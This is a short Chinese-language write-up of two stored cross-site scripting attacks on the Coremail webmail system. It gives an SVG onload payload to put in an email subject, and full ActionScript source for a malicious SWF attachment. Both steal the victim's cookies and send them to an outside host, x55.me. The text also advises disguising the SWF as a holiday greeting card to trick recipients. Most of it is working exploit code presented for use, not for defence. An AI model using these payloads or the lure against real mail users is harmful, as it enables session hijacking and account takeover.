(1):Coremail邮件系统存储型XSS之一
给受害者发送主题如下的邮件:
<svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'>
当受害者试图打开邮件时,cookie将会被窃取:
(2):Coremail邮件系统存储型XSS之二
将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf):
swf文件的AS代码如下(将就着看吧,东拼西凑整出来的):
package {import flash.external.ExternalInterface;import flash.display.Sprite;import flash.display.Sprite;import flash.events.Event;import flash.net.URLLoader;import flash.net.URLRequest;import flash.text.TextField;import flash.text.TextFieldAutoSize;import flash.xml.*;import flash.events.IOErrorEvent;import flash.events.*;import flash.net.*;/*** @author User*/public class csrf extends Sprite {private var loader:URLLoader;public function csrf() {var res:String = ExternalInterface.call("function(){return document.cookie;}"); doGet(res);}private function doGet(res:String):void{loader = new URLLoader();var target:String = "http://x55.me/geo.php?get="+res; var request:URLRequest = new URLRequest(target);try {loader.load(request);} catch (error:Error) {sendDatatoJS("Error: " + error.getStackTrace()); }}private function sendDatatoJS(data:String):void{trace(data);ExternalInterface.call("colsole.log", data); }}}
一旦受害者打开附件里的swf文件,其cookies就会发送到攻击者的站点。